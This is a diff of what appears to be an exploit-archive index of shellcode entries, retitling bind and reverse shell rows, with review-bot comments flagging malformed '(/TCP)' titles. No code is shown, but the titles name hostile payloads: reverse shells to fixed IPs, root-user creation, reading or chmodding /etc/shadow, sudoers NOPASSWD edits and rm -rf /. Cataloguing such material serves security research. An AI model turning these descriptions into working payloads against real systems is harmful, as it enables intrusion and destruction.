-13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
+13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
 13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
 13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
@@ -35,15 +35,15 @@ id,file,description,date,author,type,platform
 13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
 13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
 13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
-13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
+13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
 13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
 13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
 13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
-13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
-13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
+13282,shellcodes/generator/13282.php,"Linux/x86 - Bind (/TCP) Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
+13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind (/TCP) Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
 13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
 13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator + Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
-13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
+13286,shellcodes/generator/13286.c,"Windows - Reverse (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
 13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator
 13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
 13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
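Review bot: Rows 13282 and 13283 in this hunk are retitled to `Bind (/TCP) Shell Shellcode (Generator)`, which leaves an empty port in front of `/TCP`; it looks like the `Bind TCP (port/TCP)` to `Bind (port/TCP)` cleanup was applied mechanically to rows that never had a port. The next hunk shows the same shape for 13297 (`Reverse (/TCP) Shell`) and for 13309, where `Bind (/TCP) Listener (5555/TCP)` now names the protocol twice. These titles are what the index is searched and matched on, so for port-less rows I would keep the earlier wording, e.g. `"Linux/x86 - Bind TCP Shell Shellcode (Generator)"`, and fold 13309 into `Bind (5555/TCP) Listener`.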
@@ -52,29 +52,29 @@ id,file,description,date,author,type,platform
 13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
 13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
 13296,shellcodes/linux_x86-64/13296.c,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
-13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
-13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
+13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse (/TCP) Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
+13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
 13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
-13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
+13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
-13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
-13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
+13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
+13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
 13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
 13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
-13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
+13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind (/TCP) Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
 13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
 13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
 13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
-13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
+13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
 13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
 13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
 13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86
-13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
-13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
-13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
+13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
+13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
+13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
 13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86
 13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
@@ -84,7 +84,7 @@ id,file,description,date,author,type,platform
 13326,shellcodes/linux_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,linux_x86
 13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
 13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
-13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
+13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
@@ -92,9 +92,9 @@ id,file,description,date,author,type,platform
 13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86
 13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86
 13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
-13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
+13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
 13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
-13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
+13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
 13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86
 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86
@@ -115,21 +115,21 @@ id,file,description,date,author,type,platform
 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
+13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
+13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
 13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
-13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
-13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
+13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
+13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
 13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
-13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
+13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
 13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
 13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
 13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
 13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
 13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
 13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
-13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
-13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
+13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
+13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
 13375,shellcodes/linux_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13376,shellcodes/linux_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
 13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
@@ -142,13 +142,13 @@ id,file,description,date,author,type,platform
 13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
 13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
 13386,shellcodes/linux_x86/13386.c,"Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
-13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
-13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
+13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
+13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
 13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
 13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
 13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
 13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
-13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
+13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
 13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
 13396,shellcodes/linux_x86/13396.c,"Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
@@ -156,7 +156,7 @@ id,file,description,date,author,type,platform
 13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
 13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
 13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86
-13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator
+13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse (/TCP) Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator
 13402,shellcodes/linux_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,linux_x86
 13403,shellcodes/linux_x86/13403.c,"Linux/x86 - dup2(0_0) + dup2(0_1) + dup2(0_2) Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13404,shellcodes/linux_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
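Review bot: Row 13401 on the new side of the `@@ -156,7 +156,7 @@` hunk is retitled `Reverse (/TCP) Shell`, which leaves an empty slot before `/TCP`; the rename seems to assume every title already carried a port or host:port in parentheses, and this row's old title had none. The same artifact appears on the new side of rows 13436, 13497, 13498 and 13514 in later hunks. For rows with no port in the old title I would keep the old wording, e.g. `"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)"`, so that anyone filtering the index by protocol or port gets a well-formed title. Row 13435 also still reads `Telnet Shel Shellcode` on both sides, which this pass could correct to `Telnet Shell Shellcode`.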
@@ -182,7 +182,7 @@ id,file,description,date,author,type,platform
 13424,shellcodes/linux_x86/13424.c,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
 13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
 13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
-13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
+13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
 13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
@@ -190,8 +190,8 @@ id,file,description,date,author,type,platform
 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
 13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
-13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
-13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
+13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
+13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse (/TCP) Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
 13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
 13439,shellcodes/linux_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,linux_x86
@@ -203,8 +203,8 @@ id,file,description,date,author,type,platform
 13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
-13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
-13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
